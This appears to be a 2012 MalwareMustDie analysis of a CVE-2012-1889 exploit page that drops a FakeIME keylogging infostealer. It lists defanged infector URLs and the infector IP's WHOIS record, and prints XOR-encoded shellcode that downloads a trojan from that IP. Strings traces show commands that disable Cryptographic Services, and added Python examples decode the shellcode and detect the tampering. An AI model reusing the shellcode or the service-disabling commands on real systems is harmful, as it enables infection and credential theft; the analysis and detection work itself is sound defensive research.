- ** Chinese ExploitKit / CVE-2012-1889 | FakeIME InfoStealer Trojan **
- ================================
- CHINESE FAKE IME INFECTIONS
- STARTING FAKE NET SERVICE
- STARTING CRYPTER SERVICE
- INFO STEALER
- Found/analysis:
- #MalwareMustDie / @unixfreaxjp
- ================================
- -----------
- Infector IP:
- -----------
- IP: 222.73.57.117
- inetnum: 222.64.0.0 - 222.73.255.255
- netname: CHINANET-SH
- descr: CHINANET shanghai province network
- descr: China Telecom
- descr: No1,jin-rong Street
- descr: Beijing 100032
- country: CN
- -----------
- Info:
- -----------
- person: Wu Xiao Li
- address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
- country: CN
- phone: +86-21-63630562
- fax-no: +86-21-63630566
- e-mail: ip-admin@mail.online.sh.cn
- nic-hdl: XI5-AP
- mnt-by: MAINT-CHINANET-SH
- changed: ip-admin@mail.online.sh.cn 20010510
- source: APNIC
- -----------
- Infector urls:
- -----------
- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
- h00p://9f515lzff3.pppdiy.com/xy/xop.html
- h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
- h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
- h00p://9spxqc71fa.pppdiy.com/jy/xop.html
- h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
- h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
- h00p://s52csz5u47.pppdiy.com/wd/xop.html
- h00p://s5c2ouavle.pppdiy.com/ny/xop.html
- h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
- h00p://74jjdqugds.pppdiy.com/zt/xop.html
- h00p://75kay4lxj8.pppdiy.com/jy/xop.html
- h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
- h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
- h00p://rre11swub9.pppdiy.com/yh/xop.html
- h00p://436p1bwt5s.pppdiy.com/wd/xop.html
- h00p://4a41nvbsst.pppdiy.com/tl/xop.html
- h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
- h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
- h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
- h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
- h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
- h00p://4s2aqluitq.pppdiy.com/yl/xop.html
- h00p://52jbsoqe53.pppdiy.com/ah/xop.html
- h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
- h00p://rldq7secto.pppdiy.com/jy/xop.html
- h00p://roapzl6ao6.pppdiy.com/yl/xop.html
- h00p://rohws731yt.pppdiy.com/tl/xop.html
- h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
- h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
- h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
- h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
- h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
- h00p://2tvypppa1t.pppdiy.com/jx/xop.html
- h00p://2zaco8gjga.pppdiy.com/xy/xop.html
- h00p://31fclefhp5.pppdiy.com/jy/xop.html
- h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
- h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
- h00p://rceta3uznz.pppdiy.com/xy/xop.html
- h00p://11a1tgjoav.pppdiy.com/wd/xop.html
- h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
- h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
- h00p://r89i2jzv72.pppdiy.com/ah/xop.html
- h00p://r8cvnadv11.pppdiy.com/jx/xop.html
- h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
- h00p://r9mdp167ou.pppdiy.com/xy/xop.html
- h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
- h00p://q4u427a9d9.pppdiy.com/wl/xop.html
- h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
- h00p://qfckl9xclm.pppdiy.com/xy/xop.html
- h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
- h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
- h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
- h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
- h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
- h00p://pnj1c3glru.pppdiy.com/wd/xop.html
- h00p://pnrks68rrs.pppdiy.com/wd/xop.html
- h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
- h00p://pcsssued3v.pppdiy.com/tl/xop.html
- h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
- h00p://p444fcmod8.pppdiy.com/jy/xop.html
- h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
- h00p://z1v1awk14w.pppdiy.com/zx/xop.html
- h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
- h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
- h00p://x82ndlgusg.pppdiy.com/xy/xop.html
- h00p://xgbex2gqur.pppdiy.com/wd/xop.html
- h00p://xinfejn8sh.pppdiy.com/yh/xop.html
- h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
- h00p://yzua8al89b.pppdiy.com/wd/index.ht
- h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
- h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
- h00p://vlbujx6d19.pppdiy.com/xy/xop.html
- h00p://vouludav9m.pppdiy.com/wd/xop.html
- h00p://vqouin8qdg.pppdiy.com/wd/xop.html
- h00p://wjjxh168lj.pppdiy.com/wd/index.ht
- h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
- h00p://sw29diefib.pppdiy.com/wd/xop.html
- h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
- h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
- h00p://rlcensq6ds.pppdiy.com/wd/xop.html
- h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
- h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
- h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
- h00p://pjv68ibarl.pppdiy.com/ah/xop.html
- h00p://ow858ymp4d.pppdiy.com/xx/xop.html
- h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
- h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
- h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
- h00p://mj3aqytgna.pppdiy.com/wd/xop.html
- h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
- h00p://lsjq1ic827.pppdiy.com/zt/xop.html
- h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
- h00p://kltudl7ixd.pppdiy.com/wd/xop.html
- h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
- h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht
- h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
- h00p://joez462a36.pppdiy.com/xy/xop.html
- h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
- h00p://hrwvzspefk.pppdiy.com/my/xop.html
- h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
- h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
- h00p://gzfuswbru9.pppdiy.com/xy/xop.html
- h00p://gur1nihj4g.pppdiy.com/wd/xop.html
- h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
- h00p://fs12vmyw85.pppdiy.com/wd/xop.html
- h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
- h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
- h00p://dfmta9juu5.pppdiy.com/ah/xop.html
- h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
- h00p://85qcnilv1k.pppdiy.com/my/xop.html
- h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht
- h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
- h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
- h00p://zgxx2raoak.pppdiy.com/jx/xop.html
- h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
- h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
- h00p://uc18awkxod.pppdiy.com/my/xop.html
- h00p://v2229jswhx.pppdiy.com/wd/xop.html
- h00p://pxkxilbpos.pppdiy.com/wm/xop.html
- h00p://rakwmwhpve.pppdiy.com/xy/xop.html
- h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
- h00p://ny5iceirim.pppdiy.com/jx/xop.html
- h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
- h00p://agz5utxh9u.pppdiy.com/wd/index.ht
- h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
- h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
- h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
- h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
- h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
- h00p://odvn3j955e.pppdiy.com/zx/xop.html
- h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
- h00p://oixgmmsng1.pppdiy.com/xy/xop.html
- h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
- h00p://oaicu6zotz.pppdiy.com/zt/xop.html
- h00p://oannucq891.pppdiy.com/jx/xop.html
- h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
- h00p://nkkprh379v.pppdiy.com/wd/index.ht
- h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
- h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
- h00p://mzjqths79w.pppdiy.com/yl/xop.html
- h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
- h00p://n318aq72eb.pppdiy.com/jy/xop.html
- h00p://n3zxb481z3.pppdiy.com/yh/xop.html
- h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
- h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
- h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
- h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
- h00p://mu5dptjoda.pppdiy.com/xy/xop.html
- h00p://msogw56yis.pppdiy.com/xy/xop.html
- ======================
- ANALYSIS
- ======================
- --02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
- => `xop.html'
- Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
- Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 9,950 (9.7K) [text/html]
- 02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]
- -----------------------------
- [h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
- // ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Dropped..
- <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
- <meta content="IE=7" http-equiv="X-UA-Compatible"/>
- ------------shellcode executed------------------
- 58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 // CVE-2012-1889
- 0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd
- e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5
- b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e
- 8f bd bd d5 e8 ce d8 cf e9 36 fb b1 55 03 bc bd
- bd 36 55 d7 b8 e4 55 23 bf bd bd 5f 44 d5 d2 d3
- bd bd d5 c8 cf d1 d0 e9 42 ab 38 7d c8 ae d5 d2
- d3 bd bd d5 c8 cf d1 d0 e9 36 fb b1 55 33 bc bd
- bd 36 55 d7 bc e4 55 d3 bf bd bd 5f 44 d5 d1 8e
- 8f bd d5 ce d5 d8 d1 e9 36 fb b1 55 d2 bc bd bd
- 36 55 d7 bc e4 55 f2 bf bd bd 5f 44 3c 51 bd bc
- bd bd 36 61 3c 7e 3d bd bd bd d7 bd d7 a7 ee d7
- bd 42 eb e1 8e 7d fd 3d 81 be bd c8 44 7a b9 be
- e1 fa 93 d8 7a f9 be b9 c5 d8 bd bd 8e 74 ec ec
- ee ea ec 8e 7d 36 fb e5 55 9f bc bd bd 3e 45 bd
- 54 1e bd bd bd 2d d7 bd d7 bd d7 be d7 bd d7 bf
- d5 bd bd bd 7d ee 36 fb 99 55 bc bc bd bd 34 fb
- dd d7 bd ed 42 eb 95 34 fb d9 36 fb dd d7 bd d7
- bd d7 bd d7 b9 d7 bd ed 42 eb 91 d7 bd d7 bd d7
- bd d5 a2 bd b2 bd ed 42 eb 81 34 fb c5 36 f3 d9
- 3d c1 b5 42 09 c9 b1 3d c1 b5 42 bd c9 b8 3d c9
- b5 42 09 5f 56 34 3b 3d bd bd bd 7a fb cd bd bd
- bd bd 7a fb c9 bd bd bd bd d7 bd d7 bd d7 bd 36
- fb dd ed 42 eb 85 36 3b 3d bd bd bd d7 bd 30 f3
- c9 ec 42 cb cd ed 42 cb dd 42 eb 8d 42 cb dd 42
- eb 89 42 cb c5 42 eb fd 36 46 8e 7d 8e 66 3c 51
- bd bf bd bd 36 71 3e 45 e9 c0 b5 34 a1 bc 3e 7d
- b9 56 4e 36 71 36 64 3e 7e ad 8e 7d ed ec ee ed
- ed ed ed ed ed ea ed ed 42 eb b5 36 c3 e9 55 ad
- bc bd bd 55 d8 bd bd bd d5 de cb ca bd d5 ce d5
- d9 d2 e9 36 fb b1 55 99 bd bd bd 34 fb 81 d9 1c
- b9 bd bd bd 30 1d dd 42 42 42 d7 d8 42 cb 81 36
- fb ad 55 b5 bd bd bd 8e 66 ee ee ee ee 42 6d 3d
- 85 55 3d 85 54 c8 ac 3c c5 b8 2d 2d 2d 2d c9 b5
- 36 42 e8 36 51 30 fd b8 42 5d 55 1b bd bd bd 7e
- 55 1d bd bd bd 05 ac bc b9 3d 7f b1 bd 55 2e bd
- bd bd 3c 51 bd bc bd bd 36 41 3e 7a b9 7a ba 8f
- c9 2c b1 7a fa b9 de 34 6c f2 7a fa b5 1d d8 2a
- 76 7a fa b1 ec fd 07 c2 7a fa ad 83 a0 0b 84 7a
- fa a9 05 d4 69 a6 7a fa a5 03 c2 db 1d 7a fa a1
- 41 14 8a 10 7a fa 9d 25 b7 ad 45 d9 1c 8d bd bd
- bd 36 fd b1 36 cd a1 10 36 d5 b5 36 4a d7 b9 e4
- 55 e9 bd bd bd 2d 5f 45 d5 8e 8f bd bd d5 e8 ce
- d8 cf e9 36 bb 55 e8 42 42 42 36 55 d7 b8 e4 55
- 88 bd bd bd 5f 44 8e 42 ea 42 eb b9 56 bf e5 7e
- 55 44 42 42 42 e6 7b ba 05 34 e2 bc db 7a fa b8
- 42 5d 7e ee 36 61 ee d7 fd d5 bd ad bd bd ea 36
- fb 9d 55 a5 42 42 42 e5 7e ec eb 36 c8 81 36 c9
- 93 c5 be 48 eb 36 cb 9d be 48 8e 74 f4 fc 10 be
- 78 8e 66 b2 03 ad 87 6b c9 b5 7c 76 ba be 67 fd
- 56 4c 86 a2 c8 5a e3 36 e3 99 be 60 db 36 b1 f6
- 36 e3 a1 be 60 36 b9 36 be 78 16 e3 e4 7e 55 60
- 41 42 42 0f 4f 5f 49 84 5f c0 3e 67 f5 c6 80 8f
- c9 2c b1 38 62 12 06 de 34 6c f2 ec fd 07 c2 1d
- d8 2a 76 a3 19 d9 52 2e 8f 59 29 33 ae b7 11 7f
- a4 f6 bc 79 30 a2 c9 ea db b0 42 fe 03 11 66 c0
- 4d 18 27 ef 43 1a 67 83 a0 0b 84 05 d4 69 a6 03
- c2 db 1d 41 14 8a 10 25 b7 ad 45 3d 6b 12 27 46
- ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
- 93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
- c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
- bd bd bd bd bd bd ea ea
- ↑ XOR-decoded the shellcode above and found h00p://222.73.57.117/exe/jx.exe // download path found;
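The decoding step noted above can be reproduced without running anything. The following is an added Python example, not part of the original paste and not MalwareMustDie's tooling: it takes the last four rows of the shellcode dump quoted above, guesses the single-byte XOR key as the most frequent byte (the encoded NUL padding, 0xbd here, which is also the immediate in the dump's decoder loop `80 34 0b bd`, i.e. `xor byte [ebx+ecx], 0xbd`), decodes the bytes and pulls out the embedded download URL, defanged the way the paste writes it. The key-guessing heuristic is more general than this one sample: it works for any single-byte-XOR blob that carries a run of zero padding.

```python
import re
from collections import Counter

# Last four rows of the XOR-encoded shellcode dump quoted in the write-up above
# (copied from the paste, not constructed). The trailing run of 0xbd bytes is
# the encoded NUL padding that gives the key away.
SHELLCODE_TAIL_HEX = """
ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
bd bd bd bd bd bd ea ea
"""

# Conservative pattern for an http(s) URL made of ASCII bytes.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def parse_hex_dump(dump):
    """Turn a whitespace-separated hex dump into bytes."""
    return bytes.fromhex("".join(dump.split()))


def guess_xor_key(data):
    """Guess a single-byte XOR key: the most common byte is assumed to be
    encoded NUL padding, and 0x00 ^ key == key, so that byte is the key."""
    return Counter(data).most_common(1)[0][0]


def xor_decode(data, key):
    """Apply the single-byte XOR to every byte of the buffer."""
    return bytes(b ^ key for b in data)


def extract_urls(decoded):
    """Return every http(s) URL found in the decoded bytes, as str."""
    return [m.decode("ascii") for m in URL_RE.findall(decoded)]


def defang(url):
    """Write the scheme as the paste does so the indicator is not clickable."""
    return re.sub(r"^https?", lambda m: m.group(0).replace("http", "h00p"), url)


def recover_urls_from_dump(dump):
    """Full pipeline: parse the dump, guess the key, decode, list defanged URLs."""
    data = parse_hex_dump(dump)
    key = guess_xor_key(data)
    return key, [defang(u) for u in extract_urls(xor_decode(data, key))]


if __name__ == "__main__":
    key, urls = recover_urls_from_dump(SHELLCODE_TAIL_HEX)
    print("guessed XOR key: 0x%02x" % key)
    for u in urls:
        print("embedded URL:", u)
```

Feeding the full 62-row dump through the same functions gives the same key, since the padding dominates the byte histogram there too; the URL is the only printable run long enough to matter for triage.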
- -------------------------------
- --03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
- => `jx.exe'
- Connecting to 222.73.57.117:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 48,128 (47K) [application/octet-stream]
- ------------------------------------
- Sections:
- Name   VirtAddr  VirtSize  RawSize
- UPX0   0x1000    0x7000    0      <<<<<<< PACKED!!
- UPX1   0x8000    0xc000    46592  <<<<<<< PACKED!!
- UPX2   0x14000   0x1000    512    <<<<<<< PACKED!!
- //unpacking.....
- UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
- File size Ratio Format Name
- ------------------ ------ ----------- -----------
- 58880 <- 48128 81.74% win32/pe sample
- Unpacked 1 file.
- -------bin analysis------
- Fail CRC: Claimed: 0 Actual: 60344
- Fail Compile Time: 2033-11-12 07:06:07
- Compiler: Microsoft Visual C++ v6.0
- //strange,,,,
- 0x40402c CreateToolhelp32Snapshot
- 0x404054 Process32First
- 0x404080 Process32Next
- // Renaming itself....
- call sub_40161C
- call sub_401693
- mov ebx, offset aJx3client_exe ; "JX3Client.exe"
- --------------traces---------
- // Malware OP traces...
- 000000002FE6 0000004047E6 0 MoveFileA
- 000000003032 000000404832 0 WriteFile
- 00000000303E 00000040483E 0 CreateFileA
- 00000000304C 00000040484C 0 WinExec
- 000000003074 000000404874 0 CopyFileA
- // keystroke controlling...
- 0000000030C0 0000004048C0 0 GetKeyboardLayoutList
- 0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
- 0000000030F2 0000004048F2 0 ActivateKeyboardLayout
- 00000000310C 00000040490C 0 GetKeyboardLayout
- 000000003120 000000404920 0 LoadKeyboardLayoutA
- 000000003136 000000404936 0 UnloadKeyboardLayout
- // IME Traces...
- IMM32.dll.ImmGetDescriptionA Hint[0]
- IMM32.dll.ImmInstallIMEA Hint[0]
- IMM32.dll.ImmIsIME Hint[0]
- // temp OPS data
- 00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
- 000000003820 000000405220 0 %c:\RECYCLER\%d.tmp
- // Crypter service..
- 00000000E05C 00000040FA5C 0 sc delete cryptsvc
- 00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
- 00000000E094 00000040FA94 0 net stop cryptsvc
- //registry added traces
- 00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
- 00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
- 00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
- 00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
- 00000000E134 00000040FB34 0 %sdllcache\%s
- 00000000E144 00000040FB44 0 %syu%s //
- //Drops
- C:\WINDOWS\system32\chinasougou.ime
- C:\WINDOWS\system32\yumidimap.dll
- C:\WINDOWS\system32\net1.exe
- //Malwareservice...
- Filename: net1.exe
- MD5: 3f14c041342e3fba343f2a1d11e74bba
- SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
- File Size: 124928 Bytes
- Command Line: net1 stop cryptsvc
- //Crypter Service:
- Filename: sc.exe
- MD5: a48b1c06219a01a60cd8d4d45440bde9
- SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
- File Size: 31232 Bytes
- Command Line: sc config cryptsvc start= disabled
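The service-tampering commands and drop locations above translate directly into host detection content. The following is an added Python example, not from the paste and not MalwareMustDie's code, that runs three rules over constructed sample process- and file-creation events: the `sc` / `net` / `net1` commands that delete, stop or disable `cryptsvc`; images or parent processes living at the `%c:\Recycled\%d.tmp` and `%c:\RECYCLER\%d.tmp` paths from the strings dump; and the two files the sample drops into system32. The event field names (`image`, `cmdline`, `parent`, `path`) are assumptions standing in for whatever an EDR or Sysmon pipeline emits. Because `sc.exe` and `net1.exe` are the built-in Windows tools the sample invokes, the rule keys on the command line rather than on those binaries.

```python
import re

# Constructed sample telemetry (not from the paste): process-creation and
# file-creation events whose command lines and paths mirror the indicators
# listed above, plus benign noise that must not fire.
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\WINDOWS\system32\sc.exe",
     "cmdline": "sc config cryptsvc start= disabled",
     "parent": r"C:\Recycled\1234.tmp"},
    {"image": r"C:\WINDOWS\system32\net1.exe",
     "cmdline": "net1 stop cryptsvc",
     "parent": r"C:\Recycled\1234.tmp"},
    {"image": r"C:\WINDOWS\system32\sc.exe",
     "cmdline": "sc query cryptsvc",                # benign admin check
     "parent": r"C:\WINDOWS\system32\cmd.exe"},
    {"image": r"C:\Program Files\JX3\JX3Client.exe",
     "cmdline": "JX3Client.exe",                    # the real game client
     "parent": r"C:\WINDOWS\explorer.exe"},
]
SAMPLE_FILE_EVENTS = [
    {"path": r"C:\WINDOWS\system32\chinasougou.ime"},
    {"path": r"C:\RECYCLER\7731.tmp"},
    {"path": r"C:\WINDOWS\Temp\setup.log"},         # noise
]

# "sc delete cryptsvc", "sc config cryptsvc start= disabled", "net stop cryptsvc"
# and the net1 variant seen in the trace; plain "sc query" does not match.
CRYPTSVC_TAMPER_RE = re.compile(
    r"^(?:sc|net1?)(?:\.exe)?\s+(?:delete\s+cryptsvc\b|stop\s+cryptsvc\b|"
    r"config\s+cryptsvc\b.*\bstart=\s*disabled\b)", re.I)
# %c:\Recycled\%d.tmp and %c:\RECYCLER\%d.tmp from the strings dump
RECYCLE_TMP_RE = re.compile(r"^[a-z]:\\(?:recycled|recycler)\\\d+\.tmp$", re.I)
# Files the sample drops into system32
DROPPED_NAMES = {"chinasougou.ime", "yumidimap.dll"}


def check_process(ev):
    """Return (rule, detail) alerts for one process-creation event."""
    alerts = []
    if CRYPTSVC_TAMPER_RE.search(ev["cmdline"]):
        alerts.append(("cryptsvc-tamper", ev["cmdline"]))
    for field in ("image", "parent"):
        if RECYCLE_TMP_RE.match(ev[field]):
            alerts.append(("recycle-bin-tmp", ev[field]))
    return alerts


def check_file(ev):
    """Return (rule, detail) alerts for one file-creation event."""
    alerts = []
    path = ev["path"]
    if RECYCLE_TMP_RE.match(path):
        alerts.append(("recycle-bin-tmp", path))
    name = path.rsplit("\\", 1)[-1].lower()
    if "\\system32\\" in path.lower() and name in DROPPED_NAMES:
        alerts.append(("fakeime-drop", path))
    return alerts


def scan(process_events, file_events):
    """Run all rules over both event streams and collect the alerts."""
    alerts = []
    for ev in process_events:
        alerts.extend(check_process(ev))
    for ev in file_events:
        alerts.extend(check_file(ev))
    return alerts


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS):
        print("%-16s %s" % (rule, detail))
```

The `cryptsvc-tamper` rule is the high-confidence one: disabling or deleting Cryptographic Services has almost no legitimate use on a workstation. The Recycle Bin `.tmp` path and the dropped filenames are weaker on their own but corroborate the first hit when they come from the same host within a short window.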
- ------------------------------------------------------
- VIRUS TOTAL CHECKS
- -----------------------------------------------------
- First Check in VT: (PACKED/ORIGINAL)
- https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
- McAfee : Artemis!BBFC347F66C1
- K7AntiVirus : Riskware
- TheHacker : Posible_Worm32
- F-Prot : W32/Heuristic-114!Eldorado
- ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
- TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
- Kaspersky : HEUR:Trojan.Win32.Generic
- F-Secure : Dropped:Trojan.PWS.FakeIME.B
- VIPRE : Trojan.Win32.Generic!BT
- AntiVir : TR/ATRAPS.Gen
- TrendMicro : TROJ_GEN.RCBCEHF
- McAfee-GW-Edition : Artemis!BBFC347F66C1
- Jiangmin : Trojan/Generic.algbo
- Microsoft : PWS:Win32/Lolyda.BF
- Commtouch : W32/Heuristic-114!Eldorado
- AhnLab-V3 : Trojan/Win32.Xema
- VBA32 : TrojanPSW.QQTen.ng
- PCTools : Trojan.Gen
- Ikarus : Trojan-PWS.Win32.Lolyda
- Fortinet : W32/Onlinegames.QBF!tr
- AVG : unknown virus Win32/DH{HhM6SEVn}
- Panda : Suspicious file
- ---------------------------------------------------------------------
- First Check in VT: (UNPACKED)
- https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/
- F-Secure : Dropped:Trojan.PWS.FakeIME.B
- DrWeb : BackDoor.PcClient.5930
- GData : Dropped:Trojan.PWS.FakeIME.B
- Symantec : Suspicious.Cloud.5
- Norman : W32/OnLineGames.NVOE
- ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
- eScan : Dropped:Trojan.PWS.FakeIME.B
- Fortinet : W32/Onlinegames.QBF!tr
- Emsisoft : Trojan-PWS.Win32.Lolyda!IK
- VBA32 : TrojanPSW.QQTen.ng
- Kaspersky : HEUR:Trojan.Win32.Generic
- Jiangmin : Trojan/Generic.algbo
- Rising : Trojan.Win32.Fednu.uhc
- Ikarus : Trojan-PWS.Win32.Lolyda
- AntiVir : TR/Crypt.ZPACK.Gen
- AVG : unknown virus Win32/DH{HhM6SEVn}
- Panda : Suspicious file
- ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
- Comodo : TrojWare.Win32.Poison.QBF
- INFECTOR: XOP.HTML
- https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/
- eScan : Exploit.CVE-2012-1889.Gen
- nProtect : Exploit.CVE-2012-1889.Gen
- CAT-QuickHeal : Exploit.CVE.2012.1889
- McAfee : Exploit-CVE2012-1889
- K7AntiVirus : Exploit
- F-Prot : JS/CVE-1889
- Norman : ShellCode.AA
- TotalDefense : JS/Tnega.VKD
- Avast : JS:CVE-2012-1889 [Expl]
- eSafe : JS.ShellCode.Aurora
- ClamAV : Exploit.CVE_2012_1889-6
- Kaspersky : HEUR:Exploit.Script.Generic
- BitDefender : Exploit.CVE-2012-1889.Gen
- Sophos : Mal/JSShell-B
- Comodo : TestSignature.JS.Agent.SH
- F-Secure : Exploit:JS/CVE-2012-1889.A
- DrWeb : Exploit.CVE2012-1889
- VIPRE : Exploit.HTML.CVE-2012-1889 (v)
- AntiVir : Exp/JS.Shellcode.H
- McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
- Emsisoft : Trojan.Script!IK
- ESET-NOD32 : JS/Exploit.Shellcode.A.gen
- Microsoft : Exploit:JS/ShellCode.AT
- GData : Exploit.CVE-2012-1889.Gen
- Commtouch : JS/CVE-1889
- AhnLab-V3 : JS/Agent
- Ikarus : Trojan.Script
- AVG : Exploit
- ====================================
- MALWARE MUST DIE!!!
- #MalwareMustDie
- Sept 29 2012 / @unixfreaxjp
- ===================================